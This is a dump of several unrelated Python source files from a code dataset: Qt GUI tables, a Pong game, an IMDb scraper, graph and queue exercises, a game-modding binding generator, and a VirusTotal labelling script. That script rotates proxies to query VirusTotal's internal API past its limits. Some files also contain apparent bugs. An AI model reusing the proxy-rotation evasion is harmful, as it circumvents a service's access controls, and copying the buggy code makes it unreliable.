os.path.isdir(venv_dir):\n os.system(f\"xdg-open '{venv_dir}'\")\n\n\n def delete_venv(self, event):\n \"\"\"\n Delete the selected virtual environment by clicking\n delete from the context menu in venv table.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_path = os.path.join(active_dir, venv)\n\n if self.venv_exists(venv_path):\n msg_box_critical = QMessageBox.critical(\n self,\n \"Confirm\",\n f\"Are you sure you want to delete '{venv}'?\",\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_critical == QMessageBox.Yes:\n shutil.rmtree(venv_path)\n logging.info(f\"Successfully deleted '{venv_path}'\")\n self.refresh.emit()\n\n\n\nclass ResultsTable(BaseTable):\n \"\"\"Contains the results from PyPI.\n \"\"\"\n context_triggered = pyqtSignal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.info_icon = QIcon(\n self.style().standardIcon(QStyle.SP_FileDialogInfoView)\n )\n\n def contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n install_action = QAction(\n QIcon.fromTheme(\"software-install\"),\n \"&Install module\",\n self,\n statusTip=\"Install module\"\n )\n context_menu.addAction(install_action)\n # connect to install_package() in InstallPackages() in wizard\n install_action.triggered.connect(\n lambda: self.context_triggered.emit()\n )\n\n open_pypi_action = QAction(\n self.info_icon,\n \"&Open on PyPI\",\n self,\n statusTip=\"Open on Python Package Index\"\n )\n context_menu.addAction(open_pypi_action)\n open_pypi_action.triggered.connect(\n lambda: self.open_on_pypi(event)\n )\n\n\n def open_on_pypi(self, event):\n \"\"\"\n Open pypi.org and show the project description\n of the selected package.\n \"\"\"\n url = \"https://pypi.org/project\"\n package = self.get_selected_item()\n webbrowser.open(\"/\".join([url, package, \"#description\"]))\n\n\n\nclass InterpreterTable(BaseTable):\n \"\"\"\n List the Python installs found.\n \"\"\"\n drop_item = pyqtSignal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n def contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n remove_py_action = QAction(\n self.delete_icon,\n \"&Remove from list\",\n self,\n statusTip=\"Remove this item from the table\"\n )\n context_menu.addAction(remove_py_action)\n remove_py_action.triggered.connect(\n lambda: self.remove_python(event)\n )\n\n\n def remove_python(self, event):\n \"\"\"Remove a Python version from the table.\n \"\"\"\n item = self.get_selected_item()\n\n msg_box_warning = QMessageBox.warning(\n self,\n \"Confirm\",\n \"Remove this item from list. \\nAre you sure?\",\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_warning == QMessageBox.Yes:\n with open(get_data.DB_FILE, \"r\") as f:\n lines = f.readlines()\n with open(get_data.DB_FILE, \"w\") as f:\n for line in lines:\n if item not in line:\n f.write(line)\n\n logging.info(f\"Removed '{item}' from database\")\n self.drop_item.emit()\n","sub_path":"venvipy/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":22059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"7428083","text":"from code_tester import rand, show, reader, randomize\n\ndebug = False\n\namax = int(10000)\nn = rand(5,1000)\nq = rand(5,100000)\n\nif(debug):\n amax = 2\n n = 4\n q = 3\n\nprint(n,q)\n\nfor i in range(n):\n print(rand(amax),end=' ')\nprint()\n\nfor test in range(q):\n \"\"\"\n main test case loop\n \"\"\"\n t = rand(0,2)\n a = rand(1,n-3)\n if(t==0):\n b = rand(a,n)\n print(t,a,b)\n if(t==1):\n b = rand(0,amax)\n print(t,a,b)\n if(t==2):\n b = rand(a,n)\n c = rand(1,2)\n print(t,a,b,c)\n","sub_path":"algos/array/segtrees/seg_tree/usage/range_sum/range_sum_lazy/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97046007","text":"import requests\nimport random\nimport time\nimport os\nfrom urllib import parse\nclass virustotal:\n def __init__(self):\n self.agents=[\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\",\n \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n]\n self.ip=[]\n # path=os.getcwd()\n path=os.path.dirname(os.path.abspath(__file__))\n # f=open(\"/home/ubuntu/MaliciousApplicationDetector/DataLabeler/proxies3.txt\",\"rb\")\n f=open(os.path.join(path, \"proxies3.txt\"), \"r\")\n line=f.readline()\n count=0\n while line:\n count+=1\n raw=line.split()\n self.ip.append(raw[1].decode(\"gb2312\")+\":\"+raw[2].decode(\"gb2312\"))\n line=f.readline()\n if line:\n line=f.readline()\n print(\"初始化完成,共有:\",count,\"个可用代理\")\n f.close()\n\n def label(self,url):\n data=self.PostAndScan(url)\n if not data:\n print(\"扫描失败\")\n return False\n result=self.GetReport(data)\n if not result:\n print(\"扫描失败\")\n return False\n return result\n\n def PostAndScan(self,url):\n dict={\"url\":url}\n u=parse.urlencode(dict)\n u = \"https://www.virustotal.com/ui/urls?\"+u\n retry_time=0\n while retry_time<100:\n agent=self.GetAgent()\n ip=self.GetIP()\n proxies={\"https\":ip}\n print(\"正在扫描:\",u,\"使用ip代理:\",ip,\" 使用UA:\",agent)\n try:\n response = requests.post(u, headers={\n #\"User-Agent\": agent,\n \"Referer\": \"https://www.virustotal.com/\"},proxies=proxies,timeout=5)\n return {\"id\":response.json()[\"data\"][\"id\"],\"ip\":ip}\n except:\n print(\"扫描失败,重试中...\")\n retry_time+=1\n print(\"重试100次均失败,请检查网络!\")\n return False\n\n\n\n def GetReport(self,data):\n scan_id=data[\"id\"]\n ip=data[\"ip\"]\n retry_time=0\n get_url = \"https://www.virustotal.com/ui/analyses/\" + scan_id\n while retry_time<5:\n agent=self.GetAgent()\n proxies = {\"https\": ip}\n print(\"正在获取报告:\",get_url, \"使用ip代理:\", ip)#,\" 使用UA:\",agent)\n try:\n response = requests.get(get_url, headers={\n #\"User-Agent\": agent,\n \"Referer\": \"https://www.virustotal.com/\"},proxies=proxies,timeout=10)\n print(\"获取报告成功\")\n #print(response.json())\n return {\"malicious\":response.json()[\"data\"][\"attributes\"][\"stats\"]['malicious'],\"suspicious\":response.json()[\"data\"][\"attributes\"][\"stats\"]['suspicious']}\n except:\n print(\"获取报告失败,重试中...\")\n time.sleep(20)\n retry_time+=1\n print(\"重试5次获取报告均失败,请检查网络!\")\n return False\n\n def GetAgent(self):\n return random.choice(self.agents)\n\n def GetIP(self):\n return random.choice(self.ip)\n\nif __name__==\"__main__\":\n lablor=virustotal()\n url=\"179.43.147.227\"\n res=lablor.label(url)\n print(res)\n","sub_path":"mad-proj/DataLabeler/VirusTotal3.py","file_name":"VirusTotal3.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"50488508","text":"#pong.py\n\nimport text_graphics_engine\nimport keyboard\nimport math\nimport random\n\nscreen = text_graphics_engine.screen([80,20],\" \")\npaddle_one = text_graphics_engine.obj([[0,5],[0,6],[0,7],[0,8],[0,9],[0,10]],\"[\",0,screen)\npaddle_two = text_graphics_engine.obj([[80,5],[80,6],[80,7],[80,8],[80,9],[80,10]],\"]\",0,screen)\nball = text_graphics_engine.obj([[40,10]],\"0\",0,screen)\nball_angle = math.radians(45)\nball_speed = 0.5\nball_velo = [0,0]\n\ndone = False\n\nwhile not done:\n try:\n if keyboard.is_pressed('p'):\n done = True\n if keyboard.is_pressed('s'):\n paddle_one + [0,1]\n if keyboard.is_pressed('w'):\n paddle_one + [0,-1]\n if keyboard.is_pressed('down'):\n paddle_two + [0,1]\n if keyboard.is_pressed('up'):\n paddle_two + [0,-1] \n except:\n pass\n if round(ball.coords[0][1]) == 0 or round(ball.coords[0][1]) == 20:\n ball_angle = math.degrees(ball_angle)\n ball_angle = (180-ball_angle)%360\n ball_angle = math.radians(ball_angle)\n if (round(ball.coords[0][0]) == 0 or round(ball.coords[0][0]) == 80) and (ball == paddle_one or ball == paddle_two):\n ball_angle = math.degrees(ball_angle)\n ball_angle = (360-ball_angle)%360\n ball_angle += random.randrange(-1,2)\n ball_speed += 0\n ball_angle = math.radians(ball_angle)\n if ball.coords[0][0] < 0 or ball.coords[0][0] > 80:\n ball.set_coords([[40,10]])\n \n ball_velo = [(ball_speed*math.sin(ball_angle)),(ball_speed*math.cos(ball_angle)*-1)]\n ball + ball_velo\n screen.clear_screen([ball_speed])","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535659873","text":"# # Implement Queue using stack...\n\nfrom Stack import Stack\n\n\nclass QueueUsingStack:\n\n def __init__(self):\n self.stack1 = Stack()\n self.stack2 = Stack()\n self.size = 10\n\n def display(self):\n print(\"Queue currently contains:\")\n print(self.stack1.get_stack_data())\n\n def push(self, value):\n while len(self.stack1.get_stack_data()) != 0:\n self.stack2.push(self.stack1.pop())\n self.stack1.push(value)\n while len(self.stack2.get_stack_data()) != 0:\n self.stack1.push(self.stack2.pop())\n\n def pop(self):\n if len(self.stack1.get_stack_data()) == 0:\n print(\"Queue is empty.\")\n return self.stack1.pop()\n\n def get_max_size(self):\n return self.size\n\n def set_max_size(self, size):\n return self.size == size\n\n\nq = QueueUsingStack()\nq.push(1)\nq.push(2)\nq.push(3)\nq.display()\nq.pop()\nq.display()\n","sub_path":"stack/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522768295","text":"from urllib.request import urlopen\nimport json\nimport os.path\nfrom bs4 import BeautifulSoup\nimport pprint\nimport re\n\n\n#### Task 1\nurl= \"https://www.imdb.com/india/top-rated-indian-movies/\"\ndef scrape_top_list():\n if os.path.exists(\"Top_movies.json\"):\n with open(\"Top_movies.json\") as file:\n read_file=file.read()\n file_store=json.loads(read_file)\n return file_store\n page=urlopen(url)\n soups=BeautifulSoup(page,\"html.parser\")\n main_div=soups.find(\"div\",class_=\"lister\")\n\n t_body=main_div.find(\"tbody\",class_=\"lister-list\")\n trs=t_body.find_all(\"tr\")\n \n movie_ranks=[ ]\n movie_names=[ ]\n movie_Rating=[ ]\n movie_year=[ ]\n movie_url=[ ]\n movies=[ ]\n for tr in trs:\n movie_data=tr.find(\"td\",class_=\"titleColumn\").get_text().strip()\n rank=\" \"\n for data in movie_data:\n if \".\" not in data:\n rank=rank+data\n else:\n break\n movie_ranks.append(rank)\n\n movie_name=tr.find(\"td\",class_=\"titleColumn\").a.get_text()\n movie_names.append(movie_name)\n\n movie_rating=tr.find(\"td\",class_=\"ratingColumn imdbRating\").get_text().strip()\n movie_Rating.append(movie_rating)\n\n year=tr.find(\"td\",class_=\"titleColumn\")\n years=year.find(\"span\",class_=\"secondaryInfo\").get_text()\n years=(re.sub('\\((\\d+)\\)',r'\\1',years))\n movie_year.append(int(years))\n\n movie_link=tr.find(\"td\",class_=\"titleColumn\")\n\n movie_api=movie_link.a[\"href\"]\n movie_li= \"https://www.imdb.com/\"+movie_api \n movie_url.append(movie_li)\n dis={ }\n for i in range(0,len(movie_names)):\n dis[\"name\"] = str(movie_names[i])\n dis[\"year\"] = movie_year[i]\n dis[\"position\"] = int(movie_ranks[i])\n dis[\"rating\"] =float (movie_Rating[i])\n dis[\"url\"] = movie_url[i]\n\n movies.append(dis)\n with open(\"Top_movies.json\",\"w\") as file:\n json.dump(movies,file,indent=4)\n\n return movies \nscrapped = (scrape_top_list())\n# print(scrapped)\n\n\n###Task 12\n# caste_url=\"https://www.imdb.com/title/tt0066763/fullcredits?ref_=tt_cl_sm#cast\"\ndef movie_caste_url(url):\n page=urlopen(url)\n page_parser=BeautifulSoup(page,\"html.parser\")\n # print(page_parser)\n # find_div=page_parser.find(\"div\",id=\"fullcredits_content\",class_=\"header\")\n # print(find_div)\n find_table=page_parser.find(\"table\",class_=\"cast_list\")\n # print(find_table)\n find_td=find_table.find_all(\"td\",class_=\"\")\n # print(find_td)\n name_list=[ ]\n id_list=[ ]\n store_list=[ ]\n for t in find_td:\n name=(t.get_text()).strip()\n name_list.append(name)\n ids=t.find(\"a\")[\"href\"][6:15]\n id_list.append(ids)\n for dics_index in range(len(id_list)):\n ids_dics={ }\n ids_dics[\"Name\"]=name_list[dics_index]\n ids_dics[\"ID\"]=id_list[dics_index]\n store_list.append(ids_dics)\n return store_list\n\n# id_name=movie_caste_url(caste_url)\n# print(id_name)\n\n#### 4 Task\nurl=(\"https://www.imdb.com/title/tt0066763/\")\ndef scrape_movie_details(movie_url):\n id_name=movie_caste_url(movie_url)\n page=urlopen(movie_url)\n page_soups=BeautifulSoup(page,\"html.parser\")\n\n name_div=page_soups.find(\"div\",class_=\"title_wrapper\").h1.get_text()\n\n movie_name=\" \"\n for n in name_div:\n if \"(\" not in n:\n movie_name=((movie_name+n).strip())\n else:\n break\n\n from_summry=page_soups.find(\"div\",class_=\"plot_summary\")\n director=from_summry.find(\"div\",class_=\"credit_summary_item\")\n director_name=director.find_all(\"a\")\n\n names=[ ]\n for name in director_name:\n movie_director_name=(name.get_text().strip())\n \n names.append(movie_director_name)\n\n bio_of_movie=[ ]\n movie_bio=from_summry.find(\"div\",class_=\"summary_text\").get_text().strip()\n\n bio_of_movie.append(movie_bio)\n \n div_subtext=page_soups.find(\"div\",class_=\"subtext\")\n \n movie_time=div_subtext.find(\"time\").get_text()\n str_time=(movie_time.strip().split())\n # return (len(str_time))\n\n if len(str_time)==2:\n for i in str_time:\n if \"h\" in i:\n time=int(i.strip(\"h\"))\n if \"min\" in i:\n minutes=int(i.strip(\"min\"))\n cine_time=(str(time*60+minutes)+\"min\")\n if len(str_time)==1:\n time=str_time[0][:-1]\n cine_time=(str(int(time)*60)+\"min\")\n movie_genere=div_subtext.find_all(\"a\")\n store_genere=[ ]\n for genr in movie_genere:\n genere=(genr.get_text())\n store_genere.append(genere)\n store_genere.pop()\n \n photo=page_soups.find(\"div\",class_=\"poster\").img[\"src\"]\n \n more_data=page_soups.find(\"div\",attrs={\"class\":\"article\",\"id\":\"titleDetails\"})\n data=more_data.find_all(\"div\",class_=\"txt-block\")\n movie_language_list=[ ]\n movie_country_list=[ ]\n count=0\n for txt_block_indx in data:\n txt_all_h4=txt_block_indx.find(\"h4\",class_=\"inline\")\n if count==2: \n break\n if txt_all_h4.get_text()==\"Country:\":\n coun=txt_block_indx.find(\"a\").get_text()\n movie_country_list.append(coun)\n count=count+1\n if txt_all_h4.get_text()==\"Language:\":\n langu=txt_block_indx.find_all(\"a\")\n for la in langu:\n movie_language_list.append(la.get_text())\n count=count+1\n \n movie_details={ }\n movie_details[\"name\"]=movie_name\n movie_details[\"director\"]=names\n movie_details[\"bio\"]=bio_of_movie\n movie_details[\"RunTime\"]=cine_time\n movie_details[\"genere\"]=store_genere\n movie_details[\"poster_image_url\"]=photo\n movie_details[\"country\"]=movie_country_list\n movie_details[\"Language\"]=movie_language_list\n movie_details[\"Cast\"]=id_name\n return movie_details\n\nurl_details=scrape_movie_details(url)\n# pprint.pprint(url_details)\n\n###task 5\n\napi_list=[ ]\ndef get_movie_list_details(movie_list):\n top_movie_details=[ ]\n for api in movie_list[:30]:\n api_list.append(api[\"url\"])\n # return api_list\n for api_list_index in api_list:\n url_data=scrape_movie_details(api_list_index)\n top_movie_details.append(url_data)\n return top_movie_details\n\nten_movie_details=get_movie_list_details(scrapped) \n# pprint.pprint(ten_movie_details) \n\n####### Task 14\n\ndef analyse_co_actors(scrapped):\n\tmovies= ten_movie_details[0:]\n\tdicById = {}\n\tfor i in movies: \n\t cast = i['Cast']\n\t dicById[cast[0]['ID']] = {'name' : cast[0]['Name'],'frequent_co_actors' : []} \n\n\tfor j in dicById: \n\t for k in scrapped: \n\t for l in k:\n\t if(l == 'Cast'):\n\t index = 0\n\t main = k[l][0]['ID']\n\t if(main == j): \n\t for cast in k[l][1:6]: \n\t count = 1\n\t for idmatch in dicById[j]['frequent_co_actors']:\n\t if(idmatch['id']==cast['ID']):\n\t count+=idmatch['num_movies'] \n\t n = {'id' : cast['ID'], 'Name' : cast['Name'], 'num_movies' : count} \n\t dicById[j]['frequent_co_actors'].append(n) \n\treturn dicById\n\nprint(analyse_co_actors(ten_movie_details))\n\n\n","sub_path":"forteen_task_imdb.py","file_name":"forteen_task_imdb.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"159544732","text":"from collections import defaultdict\n\ngraph = defaultdict(list)\n\n\ndef add_edge(graph,u,v):\n graph[u].append(v)\n\ndef dfs(graph,visited,src):\n print(src,end=' ')\n visited[src] = True\n for nbr in graph[src]:\n if not visited[nbr]:\n dfs(graph,visited,nbr)\n\ndef dfsToAppend(graph,src,visited,stack):\n visited[src] = True\n for nbr in graph[src]:\n if not visited[nbr]:\n dfsToAppend(graph,nbr,visited,stack)\n stack.append(src)\n\ndef reverseGraph(graph):\n g = defaultdict(list)\n for node in graph:\n for nbr in graph[node]:\n add_edge(g,nbr,node)\n return g\n\ndef printSCC(graph,src):\n visited = defaultdict(bool)\n stack = []\n dfsToAppend(graph,src,visited,stack)\n\n # Reverse the graph\n g = reverseGraph(graph)\n\n # Print SCC\n visited_scc = defaultdict(bool)\n while stack:\n node = stack.pop()\n for nbr in g[node]:\n if not visited_scc[nbr]:\n dfs(g,visited_scc,nbr)\n print(\"\")\n\nadd_edge(graph,1,0)\nadd_edge(graph,0,2)\nadd_edge(graph,2,1)\nadd_edge(graph,0,3)\nadd_edge(graph,3,4)\n\nprintSCC(graph,1)\n\n","sub_path":"Graph/SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"413954015","text":"import pickle\nimport os\nimport sys\nimport re\n\n\nclass GenDeclaration:\n\tdef __init__(self):\n\t\tself.type = None\n\t\tself.name = None\n\tdef __repr__(self):\n\t\treturn f\"{self.type}\" + (f\" {self.name}\" if self.name else \"\")\n\tdef getType(self, default=None):\n\t\treturn self.type\n\tdef getName(self, default=None):\n\t\treturn f\"p{default}\"\n\tdef getExpr(self, default=None):\n\t\tif self.type is None:\n\t\t\treturn getName(default)\n\t\treturn f\"{self.getType(default)} {self.getName(default)}\"\n\nclass GenFunction:\n\tdef __init__(self):\n\t\tself.static = False\n\t\tself.virtual = False\n\t\tself.const = False\n\t\tself.declare = None\n\t\tself.parameters = []\n\t\tself.offset = 0\n\t\tself.parent = None\n\t\tself.convention = None\n\t\tself.mangle = \"\"\n\tdef __repr__(self):\n\t\treturn f\"{self.declare}({self.parameters}) = {self.offset}\"\n\tdef getAddress(self, t, i):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn \"base+\" + str(self.offset[0])\n\n\t\tif t == \"Win32\":\n\t\t\tif \"cocos2d\" in self.parent.name:\n\t\t\t\tif linkable(self):\n\t\t\t\t\treturn f\"FunctionScrapper::pointerOf((mem{i})(&{self.parent.name}::{self.declare.name}))\"\n\t\t\t\t# return f\"dlsym((void*)base, {self.mangle})\"\n\t\t\treturn \"base+\" + str(self.offset[1])\n\n\t\tif t == \"iOS\":\n\t\t\treturn \"base+\" + str(self.offset[2])\n\n\t\tif t == \"Android\":\n\t\t\tif linkable(self) and self.declare.name not in ['constructor', 'destructor']:\n\t\t\t\treturn f\"FunctionScrapper::pointerOf((mem{i})(&{self.parent.name}::{self.declare.name}))\"\n\t\t\treturn f'(uintptr_t)dlsym((void*)base, \"{self.getMangle()}\")'\n\t\n\tdef getOffset(self, t):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn str(self.offset[0])\n\n\t\tif t == \"Win32\":\n\t\t\treturn str(self.offset[1])\n\n\t\tif t == \"iOS\":\n\t\t\treturn str(self.offset[2])\n\n\t\tif t == \"Android\":\n\t\t\treturn \"\"\n\n\tdef getMangle(self):\n\t\treturn self.mangle\n\n\nclass GenMember:\n\tdef __init__(self):\n\t\tself.declare = None\n\t\tself.offset = None\n\tdef __repr__(self):\n\t\treturn f\"{self.declare} = {self.offset}\"\n\tdef getOffset(self, t):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn self.offset[0]\n\t\tif t == \"Win32\":\n\t\t\treturn self.offset[1]\n\t\tif t == \"iOS\":\n\t\t\treturn self.offset[2]\n\nclass GenClass:\n\tdef __init__(self):\n\t\tself.info = []\n\t\tself.name = \"\"\n\t\tself.base = []\n\tdef __repr__(self):\n\t\treturn self.name + \": \" + ', '.join(self.base) + \"\\n\" + '\\n'.join(repr(r) for r in self.info)\n\npicklepath = os.path.join(os.path.dirname(__file__), \"gen.pickle\")\nplatform = sys.argv[1]\n\ndef inheritReturn(info):\n\tif info.declare.type != \"auto\":\n\t\treturn info.declare.type\n\tif len(info.parameters) == 0:\n\t\treturn f\"getPReturnOf({info.parent.name}, {info.declare.name})\"\n\tdefaults = ', '.join([info.parent.name, info.declare.name] + [f\"std::declval<{arg.getType(i)}>()\" for i, arg in enumerate(info.parameters)])\n\treturn f\"getReturnOf({defaults})\"\n\nfunctionBody = \"\"\"\t\tusing r{id} = {type};\n\t\tusing f{id} = r{id}(CallConv(__thiscall)*)({const}{cl}*{params2});\n\t\t{setAddress}\n\t\treturn reinterpret_cast({offset})(this{params});\"\"\"\n\nstaticBody = \"\"\"\t\tusing r{id} = {type};\n\t\tusing f{id} = r{id}(CallConv(__fastcall)*)({params2});\n\t\t{setAddress}\n\t\treturn reinterpret_cast({offset})({params});\"\"\"\n\nreturnlessBody = \"\"\"\t\tusing r{id} = {cl}*;\n\t\tusing f{id} = r{id}(CallConv(__thiscall)*)({const}{cl}*{params2});\n\t\t{setAddress}\n\t\treinterpret_cast({offset})(this{params});\"\"\"\n\nimplementedFunctionBody = \"\"\"\t\treturn this->{cl}::{name}({params});\"\"\"\n\nimplementedStaticBody = \"\"\"\t\treturn {cl}::{name}({params});\"\"\"\n\ndef hasstl(info):\n\tfor arg in info.parameters:\n\t\tif \"gd::\" in arg.type:\n\t\t\treturn True\n\treturn False\n\ndef linkable(info):\n\tif platform == \"Android\":\n\t\treturn not hasstl(info)\n\tif platform == \"Windows\":\n\t\tif \"cocos2d::\" in info.parent.name:\n\t\t\treturn not hasstl(info)\n\t\treturn False\n\ndef getFunctionImplementation(cl, info, i):\n\tif not isinstance(info, GenFunction):\n\t\treturn \"\"\n\n\tif linkable(info):\n\t\tbody = implementedFunctionBody\n\t\tif info.static:\n\t\t\tbody = implementedStaticBody\n\n\t\treturn body.format(\n\t\t\tid = i,\n\t\t\tparams = ', '.join(arg.getName(i) for i, arg in enumerate(info.parameters)),\n\t\t\tname = info.declare.name,\n\t\t\tcl = cl.name,\n\t\t)\n\n\tbody = functionBody\n\tif info.static:\n\t\tbody = staticBody\n\tif not info.declare.type:\n\t\tbody = returnlessBody\n\treturn body.format(\n\t\tid = i,\n\t\ttype = inheritReturn(info),\n\t\toffset = info.getOffset(platform, i), \n\t\tparams = (', ' if not info.static and len(info.parameters) > 0 else \"\") + ', '.join(arg.getName(i) for i, arg in enumerate(info.parameters)),\n\t\tname = info.declare.name,\n\t\tcl = cl.name,\n\t\tparams2 = (', ' if not info.static and len(info.parameters) > 0 else \"\") + ', '.join(arg.getType(i) for i, arg in enumerate(info.parameters)),\n\t\tconst = \"const \" if info.const else \"\",\n\t\tsetAddress = info.setAddress(platform, i),\n\t)\n\n\ndef writeIfDifferent(name, out):\n\tfilePath = os.path.join(os.path.dirname(__file__), \"..\", name)\n\n\tdef isDifferent():\n\t\twith open(filePath, \"r\") as f:\n\t\t\treturn f.read() != out\n\n\tif not os.path.isfile(filePath) or isDifferent():\n\t\twith open(filePath, \"w\") as f:\n\t\t\tf.write(out)\n\ndef getNamespace(name):\n\treturn '::'.join(name.split('::')[:-1])\n\ndef stripNamespace(name):\n\treturn name.split('::')[-1]\n\nwith open(os.path.join(os.path.dirname(__file__), \"scrap\", \"libcocos2d.demangled.txt\"), \"r\") as f2:\n\taccessSpecifier = {}\n\tfor line in f2.readlines():\n\t\tmatch = re.search(r\"(.+?):.+(cocos2d::.+?)\\(\", line)\n\t\tif match is not None:\n\t\t\taccessSpecifier[match.group(2)] = match.group(1)\n\t# im sorry\n\n\tdef getAccessSpecifierOf(func):\n\t\tif func not in accessSpecifier:\n\t\t\treturn \"private\"\n\t\treturn accessSpecifier[func]\n","sub_path":"Source/Cacao/gen/Shared.py","file_name":"Shared.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557894272","text":"from PySide2.QtCore import Qt, QMetaObject, Signal, Slot, QSize, QRect, QPoint\nfrom PySide2.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QToolButton, QMenu,\n QLabel, QSizePolicy, QDialog, QApplication, QGraphicsDropShadowEffect)\nfrom ._utils import PLATFORM, resource_path\nimport pyautogui\n\n\n_FL_STYLESHEET = resource_path('resources/frameless.qss')\n\"\"\" str: Frameless window stylesheet. \"\"\"\n\n\nclass WindowDragger(QWidget):\n\n doubleClicked = Signal()\n\n def __init__(self, window: QWidget, parent=None):\n \"\"\"\n This is the frame/titlebar.\n\n :param window: The contained window\n :type window:\n \"\"\"\n QWidget.__init__(self, parent)\n\n self._window = window\n self._mousePressed = False\n\n def mousePressEvent(self, event):\n self._mousePressed = True\n self._mousePos = event.globalPos()\n self._windowPos = self._window.pos()\n\n def mouseMoveEvent(self, event):\n if self._mousePressed:\n if event.globalPos().y() < 5 and not self._window.maximized: # Within the top part of the screen\n self._window.move(0, 0)\n self._window.showMaximized()\n elif event.globalPos().y() > 5: # Any other part of screen\n if self._window.maximized: # Coming from top part of screen\n self._window.showNormal()\n newX = event.globalPos().x() - \\\n self._window.size().width() * (event.globalPos().x() / self._window.screenSize.width())\n self._window.move(newX, event.globalPos().y())\n self._windowPos = QPoint(newX, event.globalPos().y()-8)\n self._mousePos = event.globalPos()\n else: # anywhere else\n self._window.move(self._windowPos + (event.globalPos() - self._mousePos))\n\n def mouseReleaseEvent(self, event):\n self._mousePressed = False\n self.fromMaxed = None\n\n def mouseDoubleClickEvent(self, event):\n self.doubleClicked.emit()\n\n\nclass ModernWindow(QDialog):\n \"\"\"\n Modern window.\n\n Args:\n w (QWidget): Main widget.\n parent (QWidget, optional): Parent widget.\n \"\"\"\n\n # MODAL_WINDOWS = []\n # INST = False\n\n def __init__(self, w, parent=None, modal=True):\n # Since all parent windows will also have these wrappers, the parent is actually the modernwindow\n QDialog.__init__(self, parent)\n\n # w.wrapper = self\n self._w = w\n self.setupUi()\n\n # -1 so that task bar can be shown on Windows\n self.screenSize = QSize(pyautogui.size().width, pyautogui.size().height - 1)\n self.usualSize = self.size()\n self.maximized = False\n self._movedToCenter = 0\n self.showNormal()\n\n contentLayout = QHBoxLayout()\n 